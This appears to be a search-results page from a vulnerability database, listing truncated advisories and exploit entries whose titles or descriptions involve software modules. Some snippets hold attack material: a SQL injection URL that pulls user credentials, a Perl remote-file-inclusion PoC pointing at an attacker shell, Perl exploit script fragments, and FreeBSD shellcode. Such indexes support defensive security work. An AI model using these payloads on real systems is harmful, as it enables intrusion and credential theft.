25 matches found
EUVD-2007-0656
Malware in sbrugna...
EUVD-2018-0617
Malware in sbrugna...
EUVD-2017-11849
Malware in sbrugna...
EUVD-2018-18511
Malware in sbrugna...
EUVD-2019-2256
Malware in sbrugna...
EUVD-2025-5950
Malicious code in bioql PyPI...
CVE-2024-51516
Permission control vulnerability in the ability module Impact: Successful exploitation of this vulnerability may cause features to function abnormally...
Invision Community 5.0.6 customCss RCE
Invision Community up to and including version 5.0.6 contains a remote code execution vulnerability in the theme editor's customCss endpoint. By crafting a specially formatted content parameter with an expression="..." construct, arbitrary PHP can be evaluated. This module leverages that flaw to...
Linux Distros Unpatched Vulnerability : CVE-2025-1125
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - When reading data from a hfs filesystem, grub's hfs filesystem module uses user-controlled parameters from the filesystem metadata to calculate the internal...
CVE-2024-55893
TYPO3 CVE-2024-55893 is a CSRF vulnerability in the backend UI deep-link handling and in the Log Module that can let an attacker remove log entries. Exploitation requires an active session and a user interaction with a malicious URL, aided by misconfigurations: security.backend.enforceReferrer di...
CVE-2023-39180
CVE-2023-39180 affects the Linux kernel ksmbd module. The root cause is improper memory release after the memory’s lifetime in SMB2_READ handling, enabling a network-based DoS without authentication on systems with ksmbd enabled. Public details confirm impact as denial-of-service; no vendor patch...
PT-2023-4573
Name of the Vulnerable Software and Affected Versions Python versions 0 through 2.7.18 Python versions 3.x through 3.11.3 Description The email module of Python incorrectly parses e-mail addresses that contain a special character, allowing attackers to bypass protection mechanisms. This can be...
GHSA-Q886-75M2-VFF8 Duplicate Advisory: Unauthorized privilege escalation in Mod module
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-mp9m-g7qj-6vqr. This link is maintained to preserve external references. Original Description Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit...
Synology DiskStation Manager Access Control Error Vulnerability
Synology DiskStation Manager DSM is an operating system for use on Network Storage Servers NAS from Synology Inc. of Taiwan, China. This operating system manages information such as data, files, photos, music, and more. An improper access control vulnerability exists in synoagentregisterd in...
Using a memory corruption vulnerability to escape a Python sandbox - vulnerability warning - the black bar safety net
Skipping the text of the author's README, we go straight into the technical details. The Python environment uses a custom whitelist/blacklist program to prevent access to dangerous built-in functions, modules, functions, etc. Based on the operating system, the isolation provides some additional...
KwsPHP 1.0 mg2 Module - SQL Injection
KwsPHP 1.0 mg2 Module - SQL Injection -------------------- KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit -------------------- Found : xoron -------------------- Exploit: Name: index.php?mod=mg2&album=-1//union//select//0,1,pseudo,3,4,5//from//users//where//id=1/ Pass:...
xoops101-rfi.txt
!/usr/bin/perl sub header print q ========================================================================= XOOPS modules xfsection 1.01 =Remote File Inclusion Exploit Exploit Coded by fl0 fl0w floflowsupremacyatyahoodotcom PoC:http://site.com/modules/xfsection/modify.php?dirmodule=evilShell?...
XOOPS Module myAlbum-P 2.0 - cid SQL Injection
XOOPS Module myAlbum-P 2.0 - cid SQL Injection !/usr/bin/perl Script Name: XOOPS Module myAlbum-P : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id;...
USN-320-1: PHP vulnerabilities
The phpinfo PHP function did not properly sanitize long strings. A remote attacker could use this to perform cross-site scripting attacks against sites that have publicly-available PHP scripts that call phpinfo. Please note that it is not recommended to publicly expose phpinfo. CVE-2006-0996 An...
freebsd/x86 kldload /tmp/o.o 74 bytes
No description provided by source. / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax int 0x80 xor eax,eax push eax push long 0x68732f...